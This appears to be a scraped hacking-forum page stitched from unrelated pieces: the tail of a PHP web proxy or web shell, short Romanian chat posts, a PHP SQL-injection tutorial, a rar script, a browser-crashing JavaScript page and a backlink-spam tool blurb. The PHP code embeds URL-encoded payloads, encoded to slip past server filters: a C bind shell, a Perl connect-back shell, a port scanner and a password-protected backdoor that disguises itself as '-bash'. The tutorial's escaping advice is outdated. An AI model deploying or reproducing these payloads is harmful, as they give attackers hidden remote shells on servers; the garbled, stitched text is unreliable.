foreach ($array as $key => $file_info) { $_post_body .= "--{$_data_boundary}\r\n"; $_post_body .= "Content-Disposition: form-data; name=\"$key\"; filename=\"{$file_info['name']}\"\r\n"; $_post_body .= 'Content-Type: ' . (empty($file_info['type']) ? 'application/octet-stream' : $file_info['type']) . "\r\n\r\n"; if (is_readable($file_info['tmp_name'])) { $handle = fopen($file_info['tmp_name'], 'rb'); $_post_body .= fread($handle, filesize($file_info['tmp_name'])); fclose($handle); } $_post_body .= "\r\n"; } $_post_body .= "--{$_data_boundary}--\r\n"; $_request_headers .= "Content-Type: multipart/form-data; boundary={$_data_boundary}\r\n"; $_request_headers .= "Content-Length: " . strlen($_post_body) . "\r\n\r\n"; $_request_headers .= $_post_body; } else { $array = set_post_vars($_POST); foreach ($array as $key => $value) { $_post_body .= !empty($_post_body) ? '&' : ''; $_post_body .= $key . '=' . $value; } $_request_headers .= "Content-Type: application/x-www-form-urlencoded\r\n"; $_request_headers .= "Content-Length: " . strlen($_post_body) . "\r\n\r\n"; $_request_headers .= $_post_body; $_request_headers .= "\r\n"; } $_post_body = ''; } else { $_request_headers .= "\r\n"; } fwrite($_socket, $_request_headers); $_response_headers = $_response_keys = array(); $line = fgets($_socket, 8192); while (strspn($line, "\r\n") !== strlen($line)) { @list($name, $value) = explode(':', $line, 2); $name = trim($name); $_response_headers[strtolower($name)][] = trim($value); $_response_keys[strtolower($name)] = $name; $line = fgets($_socket, 8192); } sscanf(current($_response_keys), '%s %s', $_http_version, $_response_code); if (isset($_response_headers['content-type'])) { list($_content_type, ) = explode(';', str_replace(' ', '', strtolower($_response_headers['content-type'][0])), 2); } if (isset($_response_headers['content-length'])) { $_content_length = $_response_headers['content-length'][0]; unset($_response_headers['content-length'], $_response_keys['content-length']); } if (isset($_response_headers['content-disposition'])) { $_content_disp = $_response_headers['content-disposition'][0]; unset($_response_headers['content-disposition'], $_response_keys['content-disposition']); } if (isset($_response_headers['set-cookie']) && $_flags['accept_cookies']) { foreach ($_response_headers['set-cookie'] as $cookie) { $name = $value = $expires = $path = $domain = $secure = $expires_time = ''; preg_match('#^\s*([^,\s]*)\s*=?\s*([^;]*)#', $cookie, $match) && list(, $name, $value) = $match; preg_match('#;\s*expires\s*=\s*([^;]*)#i', $cookie, $match) && list(, $expires) = $match; preg_match('#;\s*path\s*=\s*([^;,\s]*)#i', $cookie, $match) && list(, $path) = $match; preg_match('#;\s*domain\s*=\s*([^;,\s]*)#i', $cookie, $match) && list(, $domain) = $match; preg_match('#;\s*(secure\#i', $cookie, $match) && list(, $secure) = $match; $expires_time = empty($expires) ? 0 : intval(@strtotime($expires)); $expires = ($_flags['session_cookies'] && !empty($expires) && time()-$expires_time < 0) ? '' : $expires; $path = empty($path) ? '/' : $path; if (empty($domain)) { $domain = $_url_parts['host']; } else { $domain = '.' . strtolower(str_replace('..', '.', trim($domain, '.'))); if ((!preg_match('#\Q' . $domain . '\E$#i', $_url_parts['host']) && $domain != '.' . $_url_parts['host']) || (substr_count($domain, '.') < 2 && $domain{0} == '.')) { continue; } } if (count($_COOKIE) >= 15 && time()-$expires_time <= 0) { $_set_cookie[] = add_cookie(current($_COOKIE), '', 1); } $_set_cookie[] = add_cookie("COOKIE;$name;$path;$domain", "$value;$secure", $expires_time); } } if (isset($_response_headers['set-cookie'])) { unset($_response_headers['set-cookie'], $_response_keys['set-cookie']); } if (!empty($_set_cookie)) { $_response_keys['set-cookie'] = 'Set-Cookie'; $_response_headers['set-cookie'] = $_set_cookie; } if (isset($_response_headers['p3p']) && preg_match('#policyref\s*=\s*[\'"]?([^\'"\s]*)[\'"]?#i', $_response_headers['p3p'][0], $matches)) { $_response_headers['p3p'][0] = str_replace($matches[0], 'policyref="' . complete_url($matches[1]) . '"', $_response_headers['p3p'][0]); } if (isset($_response_headers['refresh']) && preg_match('#([0-9\s]*;\s*URL\s*=)\s*(\S*)#i', $_response_headers['refresh'][0], $matches)) { $_response_headers['refresh'][0] = $matches[1] . complete_url($matches[2]); } if (isset($_response_headers['location'])) { $_response_headers['location'][0] = complete_url($_response_headers['location'][0]); } if (isset($_response_headers['uri'])) { $_response_headers['uri'][0] = complete_url($_response_headers['uri'][0]); } if (isset($_response_headers['content-location'])) { $_response_headers['content-location'][0] = complete_url($_response_headers['content-location'][0]); } if (isset($_response_headers['connection'])) { unset($_response_headers['connection'], $_response_keys['connection']); } if (isset($_response_headers['keep-alive'])) { unset($_response_headers['keep-alive'], $_response_keys['keep-alive']); } if ($_response_code == 401 && isset($_response_headers['www-authenticate']) && preg_match('#basic\s+(?:realm="(.*?)")?#i', $_response_headers['www-authenticate'][0], $matches)) { if (isset($_auth_creds[$matches[1]]) && !$_quit) { $_basic_auth_realm = $matches[1]; $_basic_auth_header = ''; $_retry = $_quit = true; } else { show_report(array('which' => 'index', 'category' => 'auth', 'realm' => $matches[1])); } } } while ($_retry); if (!isset($_proxify[$_content_type])) { @set_time_limit(0); $_response_keys['content-disposition'] = 'Content-Disposition'; $_response_headers['content-disposition'][0] = empty($_content_disp) ? ($_content_type == 'application/octet_stream' ? 'attachment' : 'inline') . '; filename="' . $_url_parts['file'] . '"' : $_content_disp; if ($_content_length !== false) { if ($_config['max_file_size'] != -1 && $_content_length > $_config['max_file_size']) { show_report(array('which' => 'index', 'category' => 'error', 'group' => 'resource', 'type' => 'file_size')); } $_response_keys['content-length'] = 'Content-Length'; $_response_headers['content-length'][0] = $_content_length; } $_response_headers = array_filter($_response_headers); $_response_keys = array_filter($_response_keys); header(array_shift($_response_keys)); array_shift($_response_headers); foreach ($_response_headers as $name => $array) { foreach ($array as $value) { header($_response_keys[$name] . ': ' . $value, false); } } do { $data = fread($_socket, 8192); echo $data; } while (isset($data{0})); fclose($_socket); exit(0); } do { $data = @fread($_socket, 8192); $_response_body .= $data; } while (isset($data{0})); unset($data); fclose($_socket); if ($_content_type == 'text/css') { $_response_body = proxify_css($_response_body); } else { if ($_flags['strip_title']) { $_response_body = preg_replace('#(<\s*title[^>]*>)(.*?)(<\s*/title[^>]*>)#is', '$1$3', $_response_body); } if ($_flags['remove_scripts']) { $_response_body = preg_replace('#<\s*script[^>]*?>.*?<\s*/\s*script\s*>#si', '', $_response_body); $_response_body = preg_replace("#(\bon[a-z]+)\s*=\s*(?:\"([^\"]*)\"?|'([^']*)'?|([^'\"\s>]*))?#i", '', $_response_body); $_response_body = preg_replace('#<noscript>(.*?)</noscript>#si', "$1", $_response_body); } if (!$_flags['show_images']) { $_response_body = preg_replace('#<(img|image)[^>]*?>#si', '', $_response_body); } $tags = array ( 'a' => array('href'), 'img' => array('src', 'longdesc'), 'image' => array('src', 'longdesc'), 'body' => array('background'), 'base' => array('href'), 'frame' => array('src', 'longdesc'), 'iframe' => array('src', 'longdesc'), 'head' => array('profile'), 'layer' => array('src'), 'input' => array('src', 'usemap'), 'form' => array('action'), 'area' => array('href'), 'link' => array('href', 'src', 'urn'), 'meta' => array('content'), 'param' => array('value'), 'applet' => array('codebase', 'code', 'object', 'archive'), 'object' => array('usermap', 'codebase', 'classid', 'archive', 'data'), 'script' => array('src'), 'select' => array('src'), 'hr' => array('src'), 'table' => array('background'), 'tr' => array('background'), 'th' => array('background'), 'td' => array('background'), 'bgsound' => array('src'), 'blockquote' => array('cite'), 'del' => array('cite'), 'embed' => array('src'), 'fig' => array('src', 'imagemap'), 'ilayer' => array('src'), 'ins' => array('cite'), 'note' => array('src'), 'overlay' => array('src', 'imagemap'), 'q' => array('cite'), 'ul' => array('src') ); preg_match_all('#(<\s*style[^>]*>)(.*?)(<\s*/\s*style[^>]*>)#is', $_response_body, $matches, PREG_SET_ORDER); for ($i = 0, $count_i = count($matches); $i < $count_i; ++$i) { $_response_body = str_replace($matches[$i][0], $matches[$i][1]. proxify_css($matches[$i][2]) .$matches[$i][3], $_response_body); } preg_match_all("#<\s*([a-zA-Z\?-]+)([^>]+)>#S", $_response_body, $matches); for ($i = 0, $count_i = count($matches[0]); $i < $count_i; ++$i) { if (!preg_match_all("#([a-zA-Z\-\/]+)\s*(?:=\s*(?:\"([^\">]*)\"?|'([^'>]*)'?|([^'\"\s]*)))?#S", $matches[2][$i], $m, PREG_SET_ORDER)) { continue; } $rebuild = false; $extra_html = $temp = ''; $attrs = array(); for ($j = 0, $count_j = count($m); $j < $count_j; $attrs[strtolower($m[$j][1])] = (isset($m[$j][4]) ? $m[$j][4] : (isset($m[$j][3]) ? $m[$j][3] : (isset($m[$j][2]) ? $m[$j][2] : false))), ++$j); if (isset($attrs['style'])) { $rebuild = true; $attrs['style'] = proxify_inline_css($attrs['style']); } $tag = strtolower($matches[1][$i]); if (isset($tags[$tag])) { switch ($tag) { case 'a': if (isset($attrs['href'])) { $rebuild = true; $attrs['href'] = complete_url($attrs['href']); } break; case 'img': if (isset($attrs['src'])) { $rebuild = true; $attrs['src'] = complete_url($attrs['src']); } if (isset($attrs['longdesc'])) { $rebuild = true; $attrs['longdesc'] = complete_url($attrs['longdesc']); } break; case 'form': if (isset($attrs['action'])) { $rebuild = true; if (trim($attrs['action']) === '') { $attrs['action'] = $_url_parts['path']; } if (!isset($attrs['method']) || strtolower(trim($attrs['method'])) === 'get') { $extra_html = '<input type="hidden" name="' . $_config['get_form_name'] . '" value="' . encode_url(complete_url($attrs['action'], false)) . '" />'; $attrs['action'] = ''; break; } $attrs['action'] = complete_url($attrs['action']); } break; case 'base': if (isset($attrs['href'])) { $rebuild = true; url_parse($attrs['href'], $_base); $attrs['href'] = complete_url($attrs['href']); } break; case 'meta': if ($_flags['strip_meta'] && isset($attrs['name'])) { $_response_body = str_replace($matches[0][$i], '', $_response_body); } if (isset($attrs['http-equiv'], $attrs['content']) && preg_match('#\s*refresh\s*#i', $attrs['http-equiv'])) { if (preg_match('#^(\s*[0-9]*\s*;\s*url=)(.*)#i', $attrs['content'], $content)) { $rebuild = true; $attrs['content'] = $content[1] . complete_url(trim($content[2], '"\'')); } } break; case 'head': if (isset($attrs['profile'])) { $rebuild = true; $attrs['profile'] = implode(' ', array_map('complete_url', explode(' ', $attrs['profile']))); } break; case 'applet': if (isset($attrs['codebase'])) { $rebuild = true; $temp = $_base; url_parse(complete_url(rtrim($attrs['codebase'], '/') . '/', false), $_base); unset($attrs['codebase']); } if (isset($attrs['code']) && strpos($attrs['code'], '/') !== false) { $rebuild = true; $attrs['code'] = complete_url($attrs['code']); } if (isset($attrs['object'])) { $rebuild = true; $attrs['object'] = complete_url($attrs['object']); } if (isset($attrs['archive'])) { $rebuild = true; $attrs['archive'] = implode(',', array_map('complete_url', preg_split('#\s*,\s*#', $attrs['archive']))); } if (!empty($temp)) { $_base = $temp; } break; case 'object': if (isset($attrs['usemap'])) { $rebuild = true; $attrs['usemap'] = complete_url($attrs['usemap']); } if (isset($attrs['codebase'])) { $rebuild = true; $temp = $_base; url_parse(complete_url(rtrim($attrs['codebase'], '/') . '/', false), $_base); unset($attrs['codebase']); } if (isset($attrs['data'])) { $rebuild = true; $attrs['data'] = complete_url($attrs['data']); } if (isset($attrs['classid']) && !preg_match('#^clsid:#i', $attrs['classid'])) { $rebuild = true; $attrs['classid'] = complete_url($attrs['classid']); } if (isset($attrs['archive'])) { $rebuild = true; $attrs['archive'] = implode(' ', array_map('complete_url', explode(' ', $attrs['archive']))); } if (!empty($temp)) { $_base = $temp; } break; case 'param': if (isset($attrs['valuetype'], $attrs['value']) && strtolower($attrs['valuetype']) == 'ref' && preg_match('#^[\w.+-]+://#', $attrs['value'])) { $rebuild = true; $attrs['value'] = complete_url($attrs['value']); } break; case 'frame': case 'iframe': if (isset($attrs['src'])) { $rebuild = true; $attrs['src'] = complete_url($attrs['src']) . '&nf=1&go=proxyx'; } if (isset($attrs['longdesc'])) { $rebuild = true; $attrs['longdesc'] = complete_url($attrs['longdesc']); } break; default: foreach ($tags[$tag] as $attr) { if (isset($attrs[$attr])) { $rebuild = true; $attrs[$attr] = complete_url($attrs[$attr]); } } break; } } if ($rebuild) { $new_tag = "<$tag"; foreach ($attrs as $name => $value) { $delim = strpos($value, '"') && !strpos($value, "'") ? "'" : '"'; $new_tag .= ' ' . $name . ($value !== false ? '=' . $delim . $value . $delim : ''); } $_response_body = str_replace($matches[0][$i], $new_tag . '>' . $extra_html, $_response_body); } } if ($_flags['include_form'] && !isset($_GET['nf'])) { $_url_form = '<div style="width:100%;margin:0;text-align:center;border-bottom:1px solid #725554;color:#000000;background-color:#F2FDF3;font-size:12px;font-weight:bold;font-family:Bitstream Vera Sans,arial,sans-serif;padding:4px;">' . '<form method="post" action="' . $_script_url . '?go=proxyx">' . ' <label for="____' . $_config['url_var_name'] . '"><a href="' . $_url . '">Address</a>:</label> <input id="____' . $_config['url_var_name'] . '" type="text" size="80" name="' . $_config['url_var_name'] . '" value="' . $_url . '" />' . ' <input type="submit" name="go" value="Go" />' . ' [go: <a href="' . $_script_url . '?' . $_config['url_var_name'] . '=' . encode_url($_url_parts['prev_dir']) .' ">up one dir</a>, <a href="' . $_script_base . '">main page</a>]' . '<br /><hr />'; foreach ($_flags as $flag_name => $flag_value) { if (!$_frozen_flags[$flag_name]) { $_url_form .= '<label><input type="checkbox" name="' . $_config['flags_var_name'] . '[' . $flag_name . ']"' . ($flag_value ? ' checked="checked"' : '') . ' /> ' . $_labels[$flag_name][0] . '</label> '; } } $_url_form .= '</form></div>'; $_response_body = preg_replace('#\<\s*body(.*?)\>#si', "$0\n$_url_form" , $_response_body, 1); } } $_response_keys['content-disposition'] = 'Content-Disposition'; $_response_headers['content-disposition'][0] = empty($_content_disp) ? ($_content_type == 'application/octet_stream' ? 'attachment' : 'inline') . '; filename="' . $_url_parts['file'] . '"' : $_content_disp; $_response_keys['content-length'] = 'Content-Length'; $_response_headers['content-length'][0] = strlen($_response_body); $_response_headers = array_filter($_response_headers); $_response_keys = array_filter($_response_keys); header(array_shift($_response_keys)); array_shift($_response_headers); foreach ($_response_headers as $name => $array) { foreach ($array as $value) { header($_response_keys[$name] . ': ' . $value, false); } } echo $_response_body; exit(); } /* Nub servers now disable base64, So we'll use URLEncode, they disable that then i'll make my own encryption */ $backdoor_c = "%23include%20%3Casm%2Fioctls.h%3E%0A%23include%20%3Csys%2Ftime.h%3E%0A%23include%20%3Csys%2Fselect.h%3E%0A%23include%20%3Cstdlib.h%3E%0A%23include%20%3Cunistd.h%3E%0A%23include%20%3Cerrno.h%3E%0A%23include%20%3Cstring.h%3E%0A%23include%20%3Cnetdb.h%3E%0A%23include%20%3Csys%2Ftypes.h%3E%0A%23include%20%3Cnetinet%2Fin.h%3E%0A%23include%20%3Csys%2Fsocket.h%3E%0A%23include%20%3Cstdint.h%3E%0A%23include%20%3Cpthread.h%3E%0Avoid%20*ClientHandler(void%20*client)%7B%0Aint%20fd%20%3D%20(int)client%3B%0Adup2(fd%2C%200)%3B%0Adup2(fd%2C%201)%3B%0Adup2(fd%2C%202)%3B%0Aif(fork()%20%3D%3D%200)%0Aexecl(%22%2Fbin%2Fbash%22%2C%20%22resmon%22%2C%200)%3B%0Aclose(fd)%3B%0Areturn%200%3B%0A%7D%0Aint%20main(int%20argc%2C%20char%20*argv%5B%5D)%0A%7B%0Aint%20rsk%2C%20csk%2C%20i%20%3D%201%3B%0Apthread_t%20thread%3B%0Astruct%20sockaddr%20saddr%3B%0Astruct%20sockaddr_in%20saddrIn%3B%0Aint%20p%3Datoi(argv%5B1%5D)%3B%0Aif((rsk%20%3D%20socket(AF_INET%2C%20SOCK_STREAM%2C%20IPPROTO_TCP))%20%3D%3D%20-1)%0Areturn%20-1%3B%0AsaddrIn.sin_family%09%09%3D%20AF_INET%3B%0AsaddrIn.sin_addr.s_addr%09%3D%20INADDR_ANY%3B%0AsaddrIn.sin_p%09%09%3D%20htons(p)%3B%0Amemcpy(%26saddr%2C%20%26saddrIn%2C%20sizeof(struct%20sockaddr_in))%3B%0Asetsockopt(rsk%2C%20SOL_SOCKET%2C%20SO_REUSEADDR%2C%20(char%20*)%26i%2C%20sizeof(i))%3B%0Aif(bind(rsk%2C%20%26saddr%2C%20sizeof(saddr))%20!%3D%200)%7B%0Aclose(rsk)%3B%0Areturn%20-1%3B%0A%7D%0Aif(listen(rsk%2C%2010)%20%3D%3D%20-1)%7B%0Aclose(rsk)%3B%0Areturn%20-1%3B%0A%7D%0Awhile(1)%7B%0Aif((csk%20%3D%20accept(rsk%2C%20NULL%2C%20NULL))%20!%3D%20-1)%7B%0Apthread_create(%26thread%2C%200%2C%20handler%2C%20(void%20*)csk)%3B%0A%7D%0A%7D%0Areturn%201%3B%0A%7D"; $backdoor_perl = "%23!%2Fusr%2Fbin%2Fperl%0Ause%20Socket%3B%0Amy%20(%24iaddr%2C%24port%2C%24cmd)%3D%40ARGV%3B%0Amy%20%24paddr%3Dsockaddr_in(%24port%2C%20inet_aton(%24iaddr))%3B%0Amy%20%24proto%20%3D%20getprotobyname(%22tcp%22)%3B%0Asocket(SOCKET%2C%20PF_INET%2C%20SOCK_STREAM%2C%20%24proto)%3B%0Aconnect(SOCKET%2C%20%24paddr)%3B%0Aopen(STDOUT%2C%22%3E%26SOCKET%22)%3B%0Aopen(STDIN%2C%22%3E%26SOCKET%22)%3B%0Aprint%20SOCKET%20%22Shell%20test%5Cn%22%3B%0Aprint%20exec(%24cmd)%3B%0Aclose(STDIN)%3B%0Aclose(STDOUT)%3B"; $pl_scan = "%23!%2Fusr%2Fbin%2Fperl%0Ause%20warnings%3B%0Ause%20strict%3B%0Ause%20diagnostics%3B%0Ause%20IO%3A%3ASocket%3A%3AINET%3B%0Asub%20usage%0A%7B%0A%09die(%22%240%20host%20startport%20endport%0A%22)%3B%0A%7D%0Ausage%20unless(%40ARGV%3E1)%3B%0Amy(%24host%2C%24s%2C%24e)%3D%40ARGV%3B%0Aforeach(%24s..%24e)%20%7B%0A%09my%20%24sock%3DIO%3A%3ASocket%3A%3AINET-%3Enew%0A%09(%0A%09%09PeerAddr%3D%3E%24host%2C%0A%09%09PeerPort%3D%3E%24_%2C%0A%09%09Proto%3D%3E'tcp'%2C%0A%09%09Timeout%3D%3E2%0A%09)%3B%0A%09print%20%22Port%20%20open%0A%22%20if%20(%24%5Csock)%3B%0A%7D%0A%0A%09"; $rk_ovas = "%23include+%3cstdio.h%3e%0d%0a%23include+%3cstdlib.h%3e%0d%0a%23include+%3cerrno.h%3e%0d%0a%23include+%3cstrings.h%3e%0d%0a%23include+%3cnetinet%2fin.h%3e%0d%0a%23include+%3csys%2fsocket.h%3e%0d%0a%23include+%3csys%2ftypes.h%3e%0d%0a%23include+%3csignal.h%3e%0d%0a%23define+PASSAUTH+1+%0d%0a%0d%0a%23define+PORT++++++++++++29369%0d%0a%23define+MSG_WELCOME+++++%22r00t'd%5cn+All+commands+are+followed+by+a+%3b%5cn%22%0d%0a%23define+MSG_PASSWORD++++%22Password%3a+%22%0d%0a%23define+MSG_WRONGPASS+++%22Invalid+password%5cn%22%0d%0a%23define+MSG_OK++++++++++%22Welcome...%5cn%22%0d%0a%23define+MSG_CONTINUE++++%22Do+you+want+to+continue%3f%5cn%22%0d%0a%0d%0a%23define+HIDE++++++++++++%22-bash%22%0d%0a%23define+SHELL+++++++++++%22%2fbin%2fsh%22%0d%0a%0d%0a%23ifdef+PASSAUTH%0d%0a++++++++%23define+PASSWD+%22__RAHTPASS__%22%0d%0a%23endif%0d%0a%0d%0aint+main+(int+argc%2c+char+*argv%5b%5d)%3b%0d%0a%23ifdef+PASSAUTH%0d%0aint+login+(int)%3b%0d%0a%23endif%0d%0a%0d%0aint+background()%0d%0a%7b%0d%0aint+pid%3b%0d%0asignal(SIGCHLD%2cSIG_IGN)%3b%0d%0apid+%3d+fork()%3b%0d%0aif(pid%3e0)%0d%0a%7b%0d%0asleep(1)%3b%0d%0aexit(EXIT_SUCCESS)%3b+%0d%0a%7d%0d%0aif(pid%3d%3d0)%0d%0a%7b%0d%0asignal(SIGCHLD%2cSIG_DFL)%3b%0d%0areturn+getpid()%3b%0d%0a%7d%0d%0areturn+-1%3b%0d%0a%7d%0d%0a%0d%0aint%0d%0amain+(int+argc%2c+char+*argv%5b%5d)%0d%0a%7b%0d%0a++++++++int+sockfd%2c+newfd%2c+size%3b%0d%0a++++++++struct+sockaddr_in+local%3b%0d%0a++++++++struct+sockaddr_in+remote%3b%0d%0a++++++++char+cmd%5b256%5d%3b%0d%0a%0d%0a++++++++strcpy+(argv%5b0%5d%2c+HIDE)%3b%0d%0a++++++++signal+(SIGCHLD%2c+SIG_IGN)%3b%0d%0a%0d%0a++++++++bzero+(%26local%2c+sizeof(local))%3b%0d%0a++++++++local.sin_family+%3d+AF_INET%3b%0d%0a++++++++local.sin_port+%3d+htons+(PORT)%3b%0d%0a++++++++local.sin_addr.s_addr+%3d+INADDR_ANY%3b%0d%0a++++++++bzero+(%26(local.sin_zero)%2c+8)%3b%0d%0a%0d%0a++++++++if+((sockfd+%3d+socket(AF_INET%2c+SOCK_STREAM%2c+0))+%3d%3d+-1)+%7b%0d%0a++++++++++++++++perror(%22socket%22)%3b%0d%0a++++++++++++++++exit(1)%3b%0d%0a++++++++%7d%0d%0a%0d%0a++++++++if+(bind+(sockfd%2c+(struct+sockaddr+*)%26local%2c+sizeof(struct+sockaddr))+%3d%3d%0d%0a-1)+%7b%0d%0a++++++++++++++++perror(%22bind%22)%3b%0d%0a++++++++++++++++exit(1)%3b%0d%0a++++++++%7d%0d%0a%0d%0a++++++++if+(listen(sockfd%2c+5)+%3d%3d+-1)+%7b%0d%0a++++++++++++++++perror(%22listen%22)%3b%0d%0a++++++++++++++++exit(1)%3b%0d%0a++++++++%7d%0d%0a++++++++size+%3d+sizeof(struct+sockaddr_in)%3b%0d%0a++++++++background()%3b%0d%0a++++++++while+(1)+%7b%0d%0a++++++++++++++++if+((newfd+%3d+accept+(sockfd%2c+(struct+sockaddr+*)%26remote%2c+%26size))%0d%0a%3d%3d+-1)+%7b%0d%0a++++++++++++++++++++++++perror+(%22accept%22)%3b%0d%0a++++++++++++++++++++++++exit(1)%3b%0d%0a++++++++++++++++%7d%0d%0a%0d%0a++++++++++++++++if+(!fork+())+%7b%0d%0a++++++++++++++++++++++++send+(newfd%2c+MSG_WELCOME%2c+sizeof(MSG_WELCOME)%2c+0)%3b%0d%0a%0d%0a%23ifdef+PASSAUTH%0d%0a++++++++++++++++++++++++if+(login(newfd)+!%3d+1)+%7b%0d%0a++++++++++++++++++++++++++++++++send+(newfd%2c+MSG_WRONGPASS%2c%0d%0asizeof(MSG_WRONGPASS)%2c+0)%3b%0d%0a++++++++++++++++++++++++++++++++close+(newfd)%3b%0d%0a++++++++++++++++++++++++++++++++exit(1)%3b%0d%0a++++++++++++++++++++++++%7d%0d%0a%23endif%0d%0a%0d%0a++++++++++++++++++++++++close+(0)%3b+close(1)%3b+close(2)%3b%0d%0a++++++++++++++++++++++++dup2+(newfd%2c+0)%3b+dup2(newfd%2c+1)%3b+dup2(newfd%2c+2)%3b%0d%0a++++++++++++++++++++++++execl+(SHELL%2c+SHELL%2c+(char+*)0)%3b+close(newfd)%3b%0d%0aexit(0)%3b%0d%0a++++++++++++++++%7d%0d%0a++++++++++++++++close+(newfd)%3b%0d%0a++++++++%7d%0d%0a++++++++return+0%3b%0d%0a%7d%0d%0a%0d%0a%23ifdef+PASSAUTH%0d%0aint%0d%0alogin+(int+fd)%0d%0a%7b%0d%0a++++++++char+u_passwd%5b15%5d%3b%0d%0a++++++++int+i%3b%0d%0a%0d%0a++++++++send+(fd%2c+MSG_PASSWORD%2c+sizeof(MSG_PASSWORD)%2c+0)%3b%0d%0a++++++++recv+(fd%2c+u_passwd%2c+sizeof(u_passwd)%2c+0)%3b%0d%0a%0d%0a++++++++for+(i+%3d+0%3b+i+%3c+strlen+(u_passwd)%3b+i%2b%2b)+%7b%0d%0a++++++++++++++++if+(u_passwd%5bi%5d+%3d%3d+'%5cn'+%7c%7c+u_passwd%5bi%5d+%3d%3d+'%5cr')%0d%0a++++++++++++++++u_passwd%5bi%5d+%3d+'%5c0'%3b%0d%0a++++++++%7d%0d%0a%0d%0a++++++++if+(strcmp+(PASSWD%2c+u_passwd)+%3d%3d+0)+%7

Nu necesita. -Gonzalez

Parazitii - Avort verbal.mp3 -Gonzalez

^^ Corect spus ) Pure pwnage. -Gonzalez

Unele topicuri nu trebuie comentate, din cauza cretinismului (din videoclip), in momentul asta nu ma pot abtine si spun ca tipul e chiar infectat cu ceva virus de pe Venus sau Jupiter - nu exista antidot pentru el din pacate. -Gonzalez

24 anu asta. -Gonzalez

^ Super bingo -Gonzalez

Nivelul nostru e jos in comparatie cu alte tari din vest, asta a demonstrat politistul rebel. -Gonzalez

Mda, fara reprosuri. -Gonzalez

It’s very important to secure your data in PHP correctly. Because if you don’t, your website is in risk of being harmed by SQL injections and other dangerous code injections, which you obviously don’t want. So to protect your website against these code attacks, this tutorial was written This tutorial will explain the reasons to secure data in PHP and the best ways to easily accomplish this. Securing data before database interaction The first ‘type’ of data you should secure is the data which you will interact to the database with. Of course you could as well just use the user inputten data to interact with your database table right away, but let’s have a look at what could happen if you do so: Unsecure mysql select query(BAD): $user_input1 = "username_example"; //example of valid user input $user_input2 = " ' OR username = 'username_example"; //BAD user input $sql = "SELECT id FROM accounts WHERE username = '$user_input1' AND password = '$user_input2' "; This is an example of an unsecure sql query which could for example be used with a login system to check whether the user inputten username & password are valid. However because of it’s unsecurity users could just fill in some password like ‘OR username = ‘username_example . What will happen then, you can see from the following: $sql = "SELECT id FROM accounts WHERE username = '$user_input1' AND password = '$user_input2' "; becomes => $sql = "SELECT id FROM accounts WHERE username = 'username_example' AND password = '' OR username = 'username_example' "; Now, say, ‘username_example’ is a valid username of an account the user knows and want to login to without having to supply the password ( hack it ), he just filled in his bad code to make the query still return true because it now checks whether the username & password are correct OR the username is only correct. Which obviously is the case. So the user has now successfully logged in to the victims account. Of course you don’t want this to happen to your website’s members! So be smart, and secure your data in PHP. However this was just an example for an unsecure login system, sql query. The same thing can happen to any other sql queries which are set up unsecured, which use user inputten data straight away without securing it first. In the above example the coder made atleast 2 major security faulths: * Coder used the user inputten data straight away into a sql query * Coder put the user inputten data in the query between single quotes The first faulth was explained above. But beside that it was also very wrong to put the user input data between single quotes which, as you could see in the above example of a bad user input, made the user able to easily bypass/get round these quotes and add another part to the query themselves. So the first thing we should do to make this query to secure is put it between ‘”. and .”‘: So in general example: $better_query = "SELECT field FROM table WHERE field = '".$_POST['userinput_fieldname']."' "; But still this isn’t enough. However it’s already a lot harder now for the user to inject codes inside the query, it still can be done. To prevent this totally, we can use the security function made by PHP: mysql_real_escape_string. This function will escape all dangerous contents out of the user inputten data. So it can’t do any harm to your sql query and database and/or website anymore. Secure and proper select query example (GOOD): $better_query = "SELECT field FROM table WHERE field = '".mysql_real_escape_string($_POST['userinput_fieldname'])."' "; Allright, so now atleast our query is secured and safe. The same can be done by INSERTING data into the database however there’s still one thing that could possibly happen: an error can occur when users use symbols such as ‘ and ” (quotes) in an inapropperiate way. To fix this, we can make PHP add slasshes before these symbols to escape them. This will make these quotes for example, to be threatend as plain text. A function that does this for us is: addslashes. Secure and proper insert query example (GOOD): $secure_and_proper_query = "INSERT INTO table(field)VALUES('".addslashes(mysql_real_escape_string($_POST['userinput_fieldname']))."' "; When doing this you might want to use stripslashes again when rertrieving the data, if it happens to show the slashes in the output. Securing data before database output It’s also not always safe to output user input data from database straight away, especially when you haven’t secured the user input data. If you DO secure the user input data to the database as done above, you should be safe, but to be 100% sure the database fields don’t contain any codes that will be executed: a function such as htmlspecialchars could be used. This function escapes all possibly harming tags/symbols out of the data. For example < will become <. Which will only be converted once by the browser into the text symbol < and which won't be executed as a code ( such as < b > normally would make text bold ). Secure Output Example: //example of bad user input from database or input field $bad_userinput = "make whole page from here bold! <b> and mess up layout </table> or <table>"; echo htmlspecialchars($bad_userinput); //hah I won't! And Fixed - your webpage has been prevented of being totally messed up by the user input. Hope you learnt something and don’t forget: always secure user inputten data in PHP before using ;-)!

#!/bin/bash #Author: Avek #Add all files/folders from folder to different archives #Delete files/folders after successfully adding to rar #Split to volume set in mb by user - 1st option eg #./script 10 = 10mb splits Standard size = 100 mb if [ $1 ]; then SIZE=$(($1 * 1024)) else SIZE=$((100 * 1024)) fi Sname=`echo $0 | sed 's/.\///g'`; for x in * do if [ "$x" == "$Sname" ]; then echo -ne; elif [ -d "$x" ] || [ -e "$x" ]; then rar a -df -m0 -v"$SIZE"k "$x".rar "$x" fi done

Ar fi frumos in orice caz. E greu la inceput, dar se poate incepe. -Gonzalez

Nu eu l-am scris. Dar m-am gandit sa-l postez, poate la careva ii prinde bine. -Gonzalez

Works on: SeaMonkey 2.0.2, Firefox 3.6, Internet Exlorer 6,7 and 8, Safari 4.0.4 Just save it as "sometext.html" <!-- SeaMonkey 2.0.2, Firefox 3.6, Internet Exlorer 6,7 and 8, Safari 4.0.4 - Simple HTML(JS) Remote Denial of Service Example --> <body onload="javascript:Kill();"></body> <script> function Kill() { for (i=0;i<1;i++) { document.write('<html><marquee><h'+i+'>'+i); i--; } } </script>

[statBlaster 5.2] Update 17: Improved Help Revision 7: Quality Control Last updated: February 13, 2010 Description StatBlaster is a free utility that logs your site onto statistics/whois websites, generating backlinks along the way. To use StatBlaster: 1. Add or import the addresses of the websites you want to promote into the "Your Domains" list. 2. In the "Statistics Websites" box, enter the location of the file that contains the list of statistics websites you want to blast to. The websites should be separated by line and marked with for the location of your domain. 3. Select the maximum number of connections you want to use. More connections speed up submission, but also use more memory. 4. Click "Start". The download section also includes a list of 2,566 URLs prepared for StatBlaster. Lastest Update Version 5.2 improves the integrated help to show tips when you hover over a portion of the StatBlaster interface. These tips can be turned off through the Help menu. A bug involving loading saved states has been fixed. Revision 7 of urls.txt removes some links that no longer work properly, 